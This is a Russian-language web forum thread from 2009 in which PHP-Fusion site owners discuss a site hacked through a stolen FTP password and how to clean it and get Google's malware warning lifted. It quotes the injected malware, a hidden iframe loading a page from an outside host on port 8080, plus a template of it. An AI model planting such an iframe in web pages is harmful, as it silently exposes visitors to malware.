Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Разное | Вопросы / Жалобы / Предложения
# 1 Тема: Мой сайт взломали
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 28 Июля 2009, 17:07:20
Всем привет.
Вообщем мой сайт или взломан или заражен,я незнаю если честно помогите пожалуйста,пишет что мой сайт атакует компьютеры ..
www.knife-elite.ru

Да и вообще лаги какие то с сайтом были в последнее время

Помогите пожалуйста
 
^ наверх ^ http://ice-cs.ru
# 2  
dicoz
Пользователь

Avatar пользователя

dicoz

Любитель Fusion

Сообщений: 215
Откуда: Украина
Зарегистрирован: 19 Октября 2008, 20:16:55
Сказали спасибо 5 раз
Статус: offline
ICQ статус 248570740
Опубликовано 28 Июля 2009, 18:34:47
А ты не используешь продажу iframe трафика?


--------------------
Осваиваю 3тий палец в изучении движка, нечего их всего 5 smiley
<hr>
Чем больше я узнаю, тем больше понимаю что нечего не знаю (с)
^ наверх ^ 248570740
# 3  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 12:15:07
Сказали спасибо 353 раз
Статус: offline
ICQ статус 491499392
Опубликовано 28 Июля 2009, 19:33:10
Миня там зобанили, я обижусь! smiley


--------------------
пример соц.инженерии | Сайт поддержки для 7ой версии http://rusfusion.ru/
Все ответы в личных сообщениях - после их оплаты (вот и пропало желание спрашивать smiley )
Мой Сайт-каталог модификаций - стань т0естером
^ наверх ^ 491499392 http://unlogic.info/
# 4  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 28 Июля 2009, 20:01:46
dicoz написал:
А ты не используешь продажу iframe трафика?

Знал бы что это такое smiley
 
^ наверх ^ http://ice-cs.ru
# 5  
lumian
Пользователь

Avatar пользователя




Любитель Fusion

Сообщений: 192
Откуда: Вологда
Зарегистрирован: 02 Апреля 2008, 16:06:17
Сказали спасибо 16 раз
Статус: offline
Опубликовано 29 Июля 2009, 12:10:03
Блин, люди, ну что вы все как дети, не умеете ставить нормальные права на папки и файлы - не кричите потом - "Меня взломали". На 99% уверен, что у тебя на сайте права на файлы и папки - 777.
Права 777 должны быть только на определенных папках и файлах, в таких случаях лучше всего использовать спечиально сформированные .htaccess файлы, дабы злоумышленник не смог загрузить туда ничего лишнего...
 
^ наверх ^
# 6  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 29 Июля 2009, 12:21:38
755 стоят везде,только на определенных стоит 777,у меня взломали акаунт фтп как я узнал,пока дальше незнаю что делать,как убрать чтоб он не писал,что мой сайт атакует компьютеры.. т.к. вроде бы я убрал
 
^ наверх ^ http://ice-cs.ru
# 7  
lumian
Пользователь

Avatar пользователя




Любитель Fusion

Сообщений: 192
Откуда: Вологда
Зарегистрирован: 02 Апреля 2008, 16:06:17
Сказали спасибо 16 раз
Статус: offline
Опубликовано 29 Июля 2009, 12:55:49
И что это за злой дядя, который пишет, что сайт атакует компьютеры?

Opera - молчит;
FireFox - молчит;
IE 8 - молчит;


[Изменил(а) lumian, 29 Июля 2009, 13:00:41]  
^ наверх ^
# 8  
ATM
Пользователь

Avatar пользователя


ATM

Завсегдатый

Сообщений: 71
Откуда: Ижевск
Зарегистрирован: 12 Ноября 2008, 14:09:26
Сказали спасибо 2 раз
Статус: offline
Опубликовано 29 Июля 2009, 15:34:32
ff как раз таки орет что сайт заражен...


--------------------
^ наверх ^
# 9  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 30 Июля 2009, 02:23:35
Вообщем сегодня всё разузнал. Мой фтп пароль взломали хз скока там ботов и все файлы php который начинались с main и c index,везде или в самом низу или в середине где был добавлен код

<iframe src="http://q1e.ru:8080/index.php" width=181 height=164 style="visibility: hidden"></iframe>

Как раз этот и сайт был в списке взлома моего акаунта,я пока что везде почистил,всё стало на свои месте т.е. до этого у меня панельки сьежались куда то и т.д. Теперь жду чтоб гугл ещё раз проверил мой сайт это будет сегодня вечером,по идее теперь эту хрень с мозилы должны убрать т.к. на остальных браузерах такого выводит,ну типо "Этот сайт атакует компьютеры и т.д."
 
^ наверх ^ http://ice-cs.ru
# 10  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 30 Июля 2009, 14:09:06
Теперь всё стало нормально,но только незнаю теперь как убрать эту табличку которая от гугла красная вылезает,что мой сайт атакует компьютеры,никто незнает?
 
^ наверх ^ http://ice-cs.ru
# 11  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 12:15:07
Сказали спасибо 353 раз
Статус: offline
ICQ статус 491499392
Опубликовано 30 Июля 2009, 20:44:22
Попробуй не атаковать компютеры примерно 91 день, и я думаю все уладится.


--------------------
пример соц.инженерии | Сайт поддержки для 7ой версии http://rusfusion.ru/
Все ответы в личных сообщениях - после их оплаты (вот и пропало желание спрашивать smiley )
Мой Сайт-каталог модификаций - стань т0естером
^ наверх ^ 491499392 http://unlogic.info/
# 12  
Жан
Пользователь

Avatar пользователя

Любитель Пива.

Любитель Fusion

Сообщений: 122
Зарегистрирован: 13 Июня 2007, 23:25:45
Сказали спасибо 2 раз
Статус: offline
ICQ статус 494430057
Опубликовано 31 Июля 2009, 10:38:00
proper: зайдите на страницу и прочитайте причину, там же написано все.
Когда выходит сообщение что этот сайт атакует, то там есть информация почему.
Вирус на сайте нашел у Вас Гугл нашел.
Достаточно сложно будет.
Советую устранить опасность и написать в поддержку Гугла.


--------------------
Сео консультация, раскрутка сайтов, увеличение продаж
аська 494430057
^ наверх ^ 494430057 http://www.j-vs-v.ru/
# 13  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 31 Июля 2009, 22:06:47
Мне просто нужен человек который уже сталкивался с такой проблемой и решил.
Потому что вирусов нету на моём сайте больше,я уже убрал как 2-3 дня
 
^ наверх ^ http://ice-cs.ru
# 14  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 01 Августа 2009, 10:21:32
Всё я убрал! Нашел как! Ура!)

А Psc гавнюк ...(
 
^ наверх ^ http://ice-cs.ru
# 15  
GORDON
Пользователь

Avatar пользователя

я тут

Завсегдатый

Сообщений: 87
Зарегистрирован: 07 Мая 2007, 19:32:37
Сказали спасибо 6 раз
Статус: offline
ICQ статус 6860042
Опубликовано 01 Августа 2009, 12:30:11
proper ну так делись с народом, что было, что сделал.


--------------------
^ наверх ^ 6860042 http://www.se-symbian.ru/
# 16  
proper
Пользователь

Avatar пользователя


ICE-CS Support

Завсегдатый

Сообщений: 89
Зарегистрирован: 13 Апреля 2009, 02:35:19
Сказали спасибо 2 раз
Статус: offline
Опубликовано 03 Августа 2009, 02:24:15
Если с Вашим сайтом такое произошло - читайте.

Вы теперь думаете как же это убрать?
Есть 2 варианта :

1.-Уберется она через 3 месяца и то если не будет вредоносных кодов и т.д.
2.-А можете Вы это сделать вручную и быстрее!


Для этого

Для начала нужно убрать вредоносные коды и проверить все ФТП файлы анти вирусом и свой компьютер обязательно.

Обычно бот после взлома сует эти коды в index.php,файлы начинающиеся с main ....php,а лучше проверить все файлы с форматом php на всякий случай

Обычно код выглядит так :

<iframe src="http://сайт:8080/index.php" width=181 height=164 style="visibility: hidden"></iframe>

Сначала нужно зарегистрироваться в гугле https://www.google.com/accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fwebmasters%2Ftools%2F&followup=https%3A%2F%2Fwww.go
ogle.com%2Fwebmasters%2Ftools%2F&hl=ru&service=sitemaps


После регистрации заходим под себя и найдите Инструменты для веб-мастеров - заходим туда Жмем добавить сайт ,пишете свой сайт потом он попросит 2 способа
1.Meta teg (Вы устанавливаете код на главную страницу который вам дал гугл,обычно по умолчанию стоит) и
2.HTML file (Вы создаете файл с форматом html и имя файла переименовываете в название который так же вам даст робот)

После этого делаем завершающий штрих :

После того как Вы убрали на 100% все вредоносные коды,файлы и т.д.

Перед тем как перейти на эту ссылку обязательно в гугле войдите под себя. Вы смело идете сюда и пишите заявку на пересмотрhttps://www.google.com/webmasters/tools/home?hl=ru,в поле "Расскажите нам подробнее о том, что произошло и т.д." Я написал : "Я не знаю,наверное взломали"

Или же если Вы не смогли зайти на эту страницу можно зайти вручную
1.Заходим под себя здесьhttps://www.google.com/accounts/
2.После этого на Инструменты для веб-мастеров
3.И вот теперь заходим https://www.google.com/webmasters/tools/reconsideration?hl=ru

Всё! У меня на след. день сразу убралось это! Желаю удачи. Вдруг кому понадобится smiley Писал от нечего делать smiley


[Изменил(а) proper, 15 Августа 2009, 08:46:42]  
^ наверх ^ http://ice-cs.ru
# 17  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 12:15:07
Сказали спасибо 353 раз
Статус: offline
ICQ статус 491499392
Опубликовано 04 Августа 2009, 16:16:10
proper smileysmileysmiley Сам виноват что тебя гугл индексирует чаще чем ты заходишь smileysmileysmiley

У мну носкрипт сразу палит левые скрипты, в тч твои (не твои конечно) которые висели на 8080 портах какого то разрегенова хоста.


--------------------
пример соц.инженерии | Сайт поддержки для 7ой версии http://rusfusion.ru/
Все ответы в личных сообщениях - после их оплаты (вот и пропало желание спрашивать smiley )
Мой Сайт-каталог модификаций - стань т0естером
^ наверх ^ 491499392 http://unlogic.info/
# 18  
NffS
Пользователь

Avatar пользователя




Завсегдатый

Сообщений: 85
Зарегистрирован: 23 Августа 2008, 16:21:26
Сказали спасибо 4 раз
Статус: offline
Опубликовано 04 Августа 2009, 20:02:31
у меня тоже iframe начало появляться... что я тока не делал...и пароли от фтп и от панели менял... и 3 антивирусами комп проверял... фтп поверял... но они все равно появляються... я заметил что они появляються во второй половине дня... примерно в 3 часа =)


--------------------
http://goldtracker.ru
http://goldsoft.org
http://arsenal-london.net
^ наверх ^
# 19  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 12:15:07
Сказали спасибо 353 раз
Статус: offline
ICQ статус 491499392
Опубликовано 05 Августа 2009, 14:36:53
Смотри логи логи, ставь систему засчиты ищо.

Какие моды стоят что менял?


--------------------
пример соц.инженерии | Сайт поддержки для 7ой версии http://rusfusion.ru/
Все ответы в личных сообщениях - после их оплаты (вот и пропало желание спрашивать smiley )
Мой Сайт-каталог модификаций - стань т0естером
^ наверх ^ 491499392 http://unlogic.info/
# 20  
olaik
Пользователь

Avatar пользователя

olaik

Местный

Сообщений: 46
Зарегистрирован: 11 Июня 2009, 12:23:18
Сказали спасибо 0 раз
Статус: offline
Опубликовано 22 Сентября 2009, 17:40:02
Не подскажете что за ерунда может быть?
На сайте стоит панель последних посетителей, вижу на ней кто заходит и как давно был. Сегодня смотрю заходит Мой Супер админ без меня и что-то ищет успел щелкнуть и увидел что результат поиска какие-то MSQулы. В панели WEB-статистика нашел информацию:

Последний визит: 22-09-2009 / 17:48:09
Последняя просмотренная страница: Search.php?stext=xxx&search=Search&method=OR&stype=all&forum_id=0&datelimit=0&fields=5&sort=datestamp&order=0&char
s=50
Провайдер: Internetserviceteam
Страна: Commercial (.com)
Браузер: Microsoft Internet Explorer 5.01
ОС: Windows 2000
Общее количество кликов: 5


По видимому это ОН и был, но как ОН смог зайти как Суперадмин на сайт? Какие способы защиты есть от таких гостей?
 
^ наверх ^ http://www.olaike.ru
Перейти на форум:


56,687,625 уникальных посетителей
сейчас: 27 Января 2020, 01:20:52
Генерация страницы: 0.25 сек.

Original size:57 кб.
GZipped size: 11 кб.
Compression:80%